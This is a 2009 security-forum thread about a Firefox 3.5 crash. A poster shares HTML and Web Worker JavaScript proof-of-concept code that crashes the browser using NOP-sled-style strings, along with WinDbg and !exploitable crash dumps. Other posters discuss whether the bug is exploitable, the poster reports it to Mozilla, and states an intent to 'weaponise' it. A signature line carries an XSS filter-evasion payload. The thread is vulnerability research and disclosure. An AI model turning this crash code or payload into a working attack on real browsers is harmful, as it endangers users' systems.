Hello Sla.ckers,

This is my first post so please take it easy on me, I'm still learning. I have a question regarding debugging firefox. I have loaded the symbols from the symbol server and have some debug output; however, I am not sure what I am looking at. I am curious if this code might lead to a possible exploit? I have read a little on the recent heap spray and buffer overflow exploits on firefox and was thinking this might be along those lines. Once again I am a newbie, so if you could point me in the right direction to research I would appreciate it. My code:

index.html
-------------------------------------------
<!DOCTYPE HTML>
<html>
<head>
<title>DOS</title>
</head>
<body>
<p><h1>Please Wait, while I CRASH your Browser; it should not take long :)...</h1>:</p><div id="result"></div>

<script type="text/javascript">

var worker = new Worker("workCRASH.js");
// Watch for messages from the worker
worker.onmessage = function(event)
{
// The message from the client:
document.getElementById("result").textContent = event.data;
};
var buf = unescape("AAAAAAAAAAAAAAAAAA%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
worker.postMessage(buf);

</script>
</body>
</html>


workCRASH.js
-------------------------------------------------
onmessage = function(event){

var worker = new Worker("workCRASH.js");
worker.onmessage = function(event)
{
worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));
};
worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));

}

WinDbg Debug
-------------------------------------------
(1380.1234): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00000000`77874ea0 cc int 3
0:018> g
(1380.1574): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
xul!XPCNativeSet::Mark:
00000000`70f978e6 0fb74602 movzx eax,word ptr [esi+2] ds:002b:00000000`00000006=????

------------ Disassembly -------------------------------
xul!XPCNativeSet::Mark:
572 xpcinlines.h 00000000`70f978e6 0fb74602 movzx eax,word ptr [esi+2] ds:002b:00000000`00000006=????
573 xpcinlines.h 00000000`70f978ea 6685c0 test ax,ax


---------- VS Debug --------------

--- e:\builds\moz2_slave\win32_build\build\obj-firefox\dist\include\xpcom\nscomptr.h
64C578C2 56 push esi
64C578C3 8B F1 mov esi,ecx
64C578C5 8B 06 mov eax,dword ptr [esi]
64C578C7 83 26 00 and dword ptr [esi],0
64C578CA 85 C0 test eax,eax
64C578CC 74 06 je nsCOMPtr<nsIXPConnectJSObjectHolder>::StartAssignment+12h (64C578D4h)
64C578CE 8B 08 mov ecx,dword ptr [eax]
64C578D0 50 push eax
64C578D1 FF 51 08 call dword ptr [ecx+8]
64C578D4 8B C6 mov eax,esi
64C578D6 5E pop esi
64C578D7 C3 ret
64C578D8 56 push esi
64C578D9 6A 00 push 0
64C578DB 8B F1 mov esi,ecx
64C578DD E8 DE C6 E5 FF call nsCOMPtr_base::nsCOMPtr_base (64AB3FC0h)
64C578E2 8B C6 mov eax,esi
64C578E4 5E pop esi
64C578E5 C3 ret
--- e:\builds\moz2_slave\win32_build\build\js\src\xpconnect\src\xpcinlines.h ---
64C578E6 0F B7 46 02 movzx eax,word ptr [esi+2]
64C578EA 66 85 C0 test ax,ax
64C578ED 78 1E js XPCNativeSet::Mark+27h (64C5790Dh)
64C578EF 8D 56 04 lea edx,[esi+4]
64C578F2 0F B7 C8 movzx ecx,ax
64C578F5 EB 0C jmp XPCNativeSet::Mark+1Dh (64C57903h)
64C578F7 8B 02 mov eax,dword ptr [edx]
64C578F9 66 81 48 08 00 80 or word ptr [eax+8],8000h

The thread 'Win32 Thread' (0x17b4) has exited with code 0 (0x0).
Unhandled exception at 0x64c578e6 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x00000006.
First-chance exception at 0x64c578e6 (xul.dll) in firefox.exe: 0xC0000005: Access violation reading location 0x00000006.

Sorry for the long post... Just trying to learn here.

Thanks for the help and input.

Malloc(i)

Exploitable or not exploitable that's the question (hopefully !!exploitable):-
[sla.ckers.org]

------------------------------------------------------------------------------------------------------------

"-/style=-=expression&#40&#47;&#42;WAFs..Evasion..Filters'/-/*&#39;,/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//&#41;;"

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 08/28/2009 04:19AM by Gareth Heyes.

Okay... so I compiled the source code for !exploitable "!exploitable (pronounced “bang exploitable”) is a Windows debugging extension (Windbg) that provides automated crash analysis and security risk assessment."(http://msecdbg.codeplex.com/) and put the msce.dll in the Windows Debugger winext sub-directory. After running my code WinDbg gave me the following output using !expolitable:


(e08.a54): Break instruction exception - code 80000003 (first chance)
eax=7ef9d000 ebx=00000000 ecx=00000000 edx=77a3d2d4 esi=00000000 edi=00000000
eip=779e0004 esp=0a08fc5c ebp=0a08fc88 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!DbgBreakPoint:
779e0004 cc int 3
0:015> !load C:\Program Files (x86)\Debugging Tools for Windows (x86)\winext\MSEC.dll
0:015> g
(e08.1390): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=6701d0b0 ebx=00b60220 ecx=0d85f730 edx=66b5e9d8 esi=00000004 edi=05985370
eip=66a078e6 esp=0058ecb0 ebp=0d85f2d0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
xul!XPCNativeSet::Mark:
66a078e6 0fb74602 movzx eax,word ptr [esi+2] ds:002b:00000006=????
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x6
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:66a078e6 movzx eax,word ptr [esi+2]

Basic Block:
66a078e6 movzx eax,word ptr [esi+2]
Tainted Input Operands: esi
66a078ea test ax,ax
Tainted Input Operands: ax
66a078ed js xul!xpcnativeset::mark+0x27 (66a0790d)
Tainted Input Operands: SignFlag

Exception Hash (Major/Minor): 0x0f5b6300.0x044e685e

Stack Trace:
xul!XPCNativeSet::Mark+0x0
xul!XPCJSRuntime::GCCallback+0x2af80f
js3250!JS_HashTableEnumerateEntries+0x51
xul!DOMGCCallback+0x18
xul!jsds_GCCallbackProc+0x37
js3250!js_GC+0x3a0
xul!XPC_WN_InnerObject+0x61
nspr4!PR_Lock+0x17
xul!xpc_CloneJSFunction+0x1d
xul!XPCNativeMember::NewFunctionObject+0x58
xul!XPCWrapper::GetOrSetNativeProperty+0x13e
xul!XPC_NW_GetOrSetProperty+0xc1
xul!XPC_NW_GetProperty+0x17
js3250!js_Interpret+0x2429
js3250!JS_DHashTableOperate+0x2f3
js3250!js_Invoke+0x528b9
js3250!js_Invoke+0x447
xul!nsXPCWrappedJSClass::CallMethod+0x601
xul!nsXPCWrappedJS::CallMethod+0x38
xul!PrepareAndDispatch+0xe7
xul!SharedStub+0x16
xul!nsBrowserStatusFilter::OnStateChange+0xee
xul!nsDocLoader::FireOnStateChange+0x103
xul!nsDocLoader::OnStopRequest+0xca
xul!nsLoadGroup::RemoveRequest+0xb8
xul!nsBaseChannel::OnStopRequest+0x92
xul!nsInputStreamPump::OnStateStop+0x4a
xul!nsInputStreamPump::OnInputStreamReady+0xa2
xul!nsInputStreamReadyEvent::Run+0x1f
xul!nsThread::ProcessNextEvent+0x253
xul!nsBaseAppShell::Run+0x4a
xul!nsAppStartup::Run+0x1e
xul!XRE_main+0xe2c
Unknown
Instruction Address: 0x0000000066a078e6

Description: Data from Faulting Address controls Branch Selection
Short Description: TaintedDataControlsBranchSelection
Exploitability Classification: UNKNOWN
Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at xul!XPCNativeSet::Mark+0x0000000000000000 (Hash=0x0f5b6300.0x044e685e)

The data from the faulting address is later used to determine whether or not a branch is taken.
0:000> t
(e08.1390): Access violation - code c0000005 (!!! second chance !!!)
eax=6701d0b0 ebx=00b60220 ecx=0d85f730 edx=66b5e9d8 esi=00000004 edi=05985370
eip=66a078e6 esp=0058ecb0 ebp=0d85f2d0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
xul!XPCNativeSet::Mark:
66a078e6 0fb74602 movzx eax,word ptr [esi+2] ds:002b:00000006=????
0:000> t
(e08.1390): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=6701d0b0 ebx=00b60220 ecx=0d85f730 edx=66b5e9d8 esi=00000004 edi=05985370
eip=66a078e6 esp=0058ecb0 ebp=0d85f2d0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
xul!XPCNativeSet::Mark:
66a078e6 0fb74602 movzx eax,word ptr [esi+2] ds:002b:00000006=????


------------------------------------------------------------

How nice...

Exploitability Classification: UNKNOWN

That was of little use to me. If anyone has some input please let me know.

Thanks,
Malloc(i)

@malloci

Well that's the key in bug finding, you've got to make it exploitable. If you can influence the value of ds:002b:00000006=???? to be a section of memory then it may be exploitable. Try using different values in the code and see how exploitable reacts. BTW I'm not saying I'm an expert I'm still learning in this area

------------------------------------------------------------------------------------------------------------

"-/style=-=expression&#40&#47;&#42;WAFs..Evasion..Filters'/-/*&#39;,/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//&#41;;"

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

@Gareth Heyes

Thanks for the reply. I will try to throw some different values in and see what happens. Sort of fuzzing the input passed in to my code I guess? Anyway, I appreciate your feedback and will try some different values in my code. I am far from an expert as well; this is my first attempt at debugging a crash.

If anyone has any more ideas or input I am open to suggestions.

Thanks,

Malloc(i)

If I change the index.html code to the following firefox does not crash right away but rather stalls and creates a memory leak.??? I am trying different inputs for my code and getting very different results and crashes depending on the input. If anyone is willing to try fuzzing input for the code and see what type of results they are getting in FF3.5 I would appreciate it. I am just curious if different results/crashes might be found and how varied those results might be. Thanks for the help and feedback.

Malloc(i)

<script type="text/javascript">

var worker = new Worker("workCRASH.js");

worker.onmessage = function(event)
{

document.getElementById("result").textContent = event.data;
};
var buf = unescape("!@#$%^&*()_+");
var str = unescape("");
buf = buf+str;
worker.postMessage(buf);
</script>

So I set up a Vista instance under a VM and disabled DEP just for testing. I got the following dump from WinDbg when passing in a nop sled ("%u9090"):

(ac8.e10): Break instruction exception - code 80000003 (first chance)
eax=7ffac000 ebx=00000000 ecx=00000000 edx=7707f06d esi=00000000 edi=00000000
eip=77032ea8 esp=0572fcf4 ebp=0572fd20 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
77032ea8 cc int 3
0:015> g
ModLoad: 74f70000 74f76000 C:\Windows\System32\wship6.dll
ModLoad: 71b40000 71b46000 C:\Windows\system32\rasadhlp.dll
(ac8.38c): C++ EH exception - code e06d7363 (first chance)
(ac8.38c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=0024aab8 ebx=00348000 ecx=00000003 edx=00000000 esi=7a300000 edi=7a30000c
eip=7716b09e esp=0024aab8 ebp=0024ab08 iopl=0 nv up ei pl nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
kernel32!RaiseException+0x58:
7716b09e c9 leave

I will try to run some more tests latter this week,... looks interesting.

Once again if anyone has any feedback or suggestions please post them to let me know.

Thanks,
malloc(i)



Edited 1 time(s). Last edit at 09/02/2009 11:44AM by malloci.

More Debug output:
(484.5d0): Break instruction exception - code 80000003 (first chance)
eax=7ffdb000 ebx=00000000 ecx=00000000 edx=7707f06d esi=00000000 edi=00000000
eip=77032ea8 esp=077dfefc ebp=077dff28 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
77032ea8 cc int 3
0:017> g
(484.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=69351350 ebx=0095d220 ecx=0c3ef500 edx=68e94d41 esi=00000002 edi=0412b190
eip=68d3e528 esp=002bee40 ebp=0c3ef0d0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Mozilla Firefox\xul.dll -
xul!gfxIntSize::operator++0x548:
68d3e528 0fb74602 movzx eax,word ptr [esi+2] ds:0023:00000004=????
0:000> !load C:\Program Files\Debugging Tools for Windows (x86)\winext\msec.dll
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x4
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation

Faulting Instruction:68d3e528 movzx eax,word ptr [esi+2]

Basic Block:
68d3e528 movzx eax,word ptr [esi+2]
Tainted Input Operands: esi
68d3e52c test ax,ax
Tainted Input Operands: ax
68d3e52f js xul!gfxintsize::operator++0x56f (68d3e54f)
Tainted Input Operands: SignFlag

Exception Hash (Major/Minor): 0x292d0328.0x682d1116

Stack Trace:
xul!gfxIntSize::operator++0x548
xul!gfxPlatform::operator=+0xc4b9f
xul!gfxWindowsSurface::GetDefaultContextFlags+0x38b5
js3250!js_GC+0x3a0
Instruction Address: 0x0000000068d3e528

Description: Data from Faulting Address controls Branch Selection
Short Description: TaintedDataControlsBranchSelection
Exploitability Classification: UNKNOWN
Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at xul!gfxIntSize::operator++0x0000000000000548 (Hash=0x292d0328.0x682d1116)

The data from the faulting address is later used to determine whether or not a branch is taken.
0:000> t
eax=69351350 ebx=0095d220 ecx=0c3ef500 edx=68e94d41 esi=00000002 edi=0412b190
eip=77050e89 esp=002beb50 ebp=0c3ef0d0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!KiUserExceptionDispatcher+0x1:
77050e89 8b4c2404 mov ecx,dword ptr [esp+4] ss:0023:002beb54=002beb74
0:000> t
eax=69351350 ebx=0095d220 ecx=002beb74 edx=68e94d41 esi=00000002 edi=0412b190
eip=77050e8d esp=002beb50 ebp=0c3ef0d0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!KiUserExceptionDispatcher+0x5:
77050e8d 8b1c24 mov ebx,dword ptr [esp] ss:0023:002beb50=002beb58
0:000> g
(484.21c): Access violation - code c0000005 (!!! second chance !!!)
eax=69351350 ebx=0095d220 ecx=0c3ef500 edx=68e94d41 esi=00000002 edi=0412b190
eip=68d3e528 esp=002bee40 ebp=0c3ef0d0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
xul!gfxIntSize::operator++0x548:

------------------------------------

One interesting part which I noticed is the access violation occurs at the same address location which is stored in the eip register. I am still new to this debugging of a crash; however, I am willing to learn.

eip=68d3e528

68d3e528 0fb74602 movzx eax,word ptr [esi+2] ds:0023:00000004=????

Any ideas?
malloc(i)

Okay... so after a little testing on my own I decided to turn to Mozilla to see if they might have any ideas. After a week I got the following email from them:

"I poked at this a bit and I don't like it. Based your output it looks relatively benign, a near-null read and probable resource exhaustion (based on the testcase).

I crashed in a few different spots, still "near null", but sometimes during garbage collection, and a few times the "near null" was due to an integer overflow of adding 8 to a register containing 0xffffffff.
crashing during garbage collection is usually a very bad sign. Although I didn't find any simple modifications that moved the crash around but I can't rule out the possibility of this being exploitable.

I filed bug [bugzilla.mozilla.org] and can give you access if you have a bugzilla account."

So a bug has been filed under bugzilla and I am left with the same question... Exploitable or Not? Once again if anyone has any ideas, or can point me in another direction to research I would appreciate it.

Thanks,
malloc(i)

I think it may be exploitable?

(1698.544): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7749039d ebx=00a63220 ecx=08fcf4a0 edx=62c1e9d8 esi=00000000 edi=07aeff10
eip=62b93074 esp=0031eab4 ebp=08fcf050 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
xul!XPCJSRuntime::GCCallback+0x2af824:
62b93074 668148080080 or word ptr [eax+8],8000h ds:002b:774903a5=c933
0:000> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x774903a5
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x1c775629.0x4e251d63

Stack Trace:
xul!XPCJSRuntime::GCCallback+0x2af824
js3250!JS_HashTableEnumerateEntries+0x51
xul!DOMGCCallback+0x18
xul!jsds_GCCallbackProc+0x37
js3250!js_GC+0x3a0
nspr4!PR_Lock+0x17
js3250!js_NewGCThing+0x42195
js3250!JS_NewExternalString+0x14
xul!XPCConvert::NativeData2JS+0x3ba
xul!XPCWrappedNative::CallMethod+0x618
xul!XPC_WN_GetterSetter+0x135
js3250!js_Invoke+0x2c5
js3250!js_InternalInvoke+0x119
js3250!js_GetPropertyHelper+0x217
js3250!js_Interpret+0xc6b
js3250!js_Invoke+0x447
xul!nsXPCWrappedJSClass::CallMethod+0x601
xul!nsXPCWrappedJS::CallMethod+0x38
xul!PrepareAndDispatch+0xe7
xul!SharedStub+0x16
xul!nsContentPolicy::CheckPolicy+0x68
xul!nsContentPolicy::ShouldLoad+0x26
xul!NS_CheckContentLoadPolicy+0xdc
xul!nsDOMWorkerScriptLoader::RunInternal+0x1b8
xul!nsDOMWorkerScriptLoader::Run+0x21
xul!nsThread::ProcessNextEvent+0x253
xul!nsBaseAppShell::Run+0x4a
xul!nsAppStartup::Run+0x1e
xul!XRE_main+0xe2c
Unknown
Instruction Address: 0x0000000062b93074

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at xul!XPCJSRuntime::GCCallback+0x00000000002af824 (Hash=0x1c775629.0x4e251d63)

User mode write access violations that are not near NULL are exploitable.

Yes... Yes, I have a new PoC which seems to work from my limited testing. I believe it may be some kind of race condition within the javascript web worker. Either way, part of the time it crashes on the bug which I made mozilla aware of, the other part of the time it chrashes in an access violation error:

User mode write access violations that are near NULL are probably exploitable.



Edited 2 time(s). Last edit at 10/13/2009 11:10AM by malloci.

Awesome I'd knew you'd get there in the end!

Nice thread, I wish sla.ckers had a dedicated access violation/heap section

------------------------------------------------------------------------------------------------------------

"-/style=-=expression&#40&#47;&#42;WAFs..Evasion..Filters'/-/*&#39;,/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//&#41;;"

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

@Gareth
Thanks for the comments... I'm still trying to figure this expoilt out. I now need to try to weaponise the exploit, but that is another matter ;)

More !exploitable output:

Description: Privileged Instruction Violation
Short Description: PrivilegedInstruction
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Privileged Instruction Violation

A privileged instruction exception indicates that the attacker controls execution flow.


Wait... I love that part "A privileged instruction exception indicates that the attacker controls execution flow." nice... very nice.



Edited 2 time(s). Last edit at 10/13/2009 11:16AM by malloci.

This one is great as well. It crashed firefox with a DEP notice:

(22dc.169c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
int 3
0:032> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x630a0a0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Data Execution Protection (DEP) Violation

Exception Hash (Major/Minor): 0x5c220a7b.0x2c4b6872


User mode DEP access violations are exploitable.



Edited 1 time(s). Last edit at 10/13/2009 11:11AM by malloci.

Any feedback would be appreciated ;)



Edited 1 time(s). Last edit at 10/13/2009 11:12AM by malloci.

Ok so how about posting the stages of code that made it exploitable, so far we can see the exploitable output but what did you change to make it exploitable?

------------------------------------------------------------------------------------------------------------

"-/style=-=expression&#40&#47;&#42;WAFs..Evasion..Filters'/-/*&#39;,/**/alert(/People who say it cannot be done should not interrupt those who are doing it./)//&#41;;"

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

This is just one version of the PoC I have been coding. It is ugly code but should serve as an example to use for debugginf FF3.5. Hope to get some feedback (crashes, debug, comments, ideas).

-------------------------------------
index.html
-------------------------------------
<!DOCTYPE HTML>
<html>
<head>
<title>DOS</title>
</head>
<body>
<p><h1>Please Wait, while I CRASH your Browser; it should not take long :)...</h1>:</p><div id="result"></div>

<script type="text/javascript">
var worker = new Worker("workCRASH.js");

// Watch for messages from the worker
worker.onmessage = function(event)
{
// The message from the client:
//event.data
// alert(document.domain + " - " + event.data);
// window.location = 'index.html';
// window.location = 'index.html';
// window.open ('index.html');
document.getElementById("result").textContent = event.data;
};
//var buf = unescape("%u9090%u9090"+"%u9090%u9090"+"%u9090%u9090"+"%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
//var buf = unescape("%u0c0c%u0c0c");
var buf = unescape("\xcc\xcc\xcc\xcc");
var str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
buf = buf+str;
worker.postMessage(buf);

</script>
</body>
</html>

-----------------------------------------------------------
workCRASH.js
--------------------------------------------

onmessage = function(event){


var worker = new Worker("workCRASH.js");
worker.onmessage = function(event)
{
var worker = new Worker("workCRASH-Test.js");
worker.onmessage = function(event)
{
worker.postMessage(event.data.concat(event.data));
CollectGarbage();
postMessage(event.data.concat(event.data));
CollectGarbage();
};
worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));
};

worker.postMessage(event.data.concat(event.data));
postMessage(event.data.concat(event.data));

}

-------------------------------------
workCRASH-Test.js
------------------------------------

onmessage = function(event){

var worker = new Worker("workCRASH-Test.js");
worker.onmessage = function(event)
{
//var nop = unescape("\x90\x90\x90\x90");

var str1 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
var str2 = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

worker.postMessage(event.data.concat(str1+str2));
postMessage(event.data.concat(str1+str2));
};

worker.postMessage(event.data.concat(event.data));
postMessage(event.data);

}

____________________________________

The code is a mess right now... I have been fuzzing it with diffrent input. Give it a go and let me know if it crashes your FF3.5 browser. If you have any time to debug the crash please post some output.

You might have to run the code a few times to get it to crash on a diffrent place then the xul!XPCNativeSet::Mark: error. Like I said I have not had to much time to work on the code, it is mostly a jumbled mess right now. I still am trying to find out how I can overwrite the registers.

malloc(i)



Edited 1 time(s). Last edit at 09/24/2009 03:27PM by malloci.

Like I said... the program should crash your browser; however, try it several times as it will crash on diffrent errors. Part of the time it should display that Firefox was closed by DEP, which is most likly a very bad thing.

malloc(i)

Okay... so the [www.mozilla.org] bug/exploit which I reported was "Fixed" in the new version [news.cnet.com] FF3.5.4... or was it? Check out my [cybermediaplanet.com] PoC and at [wiki.austinhackers.org] AHA.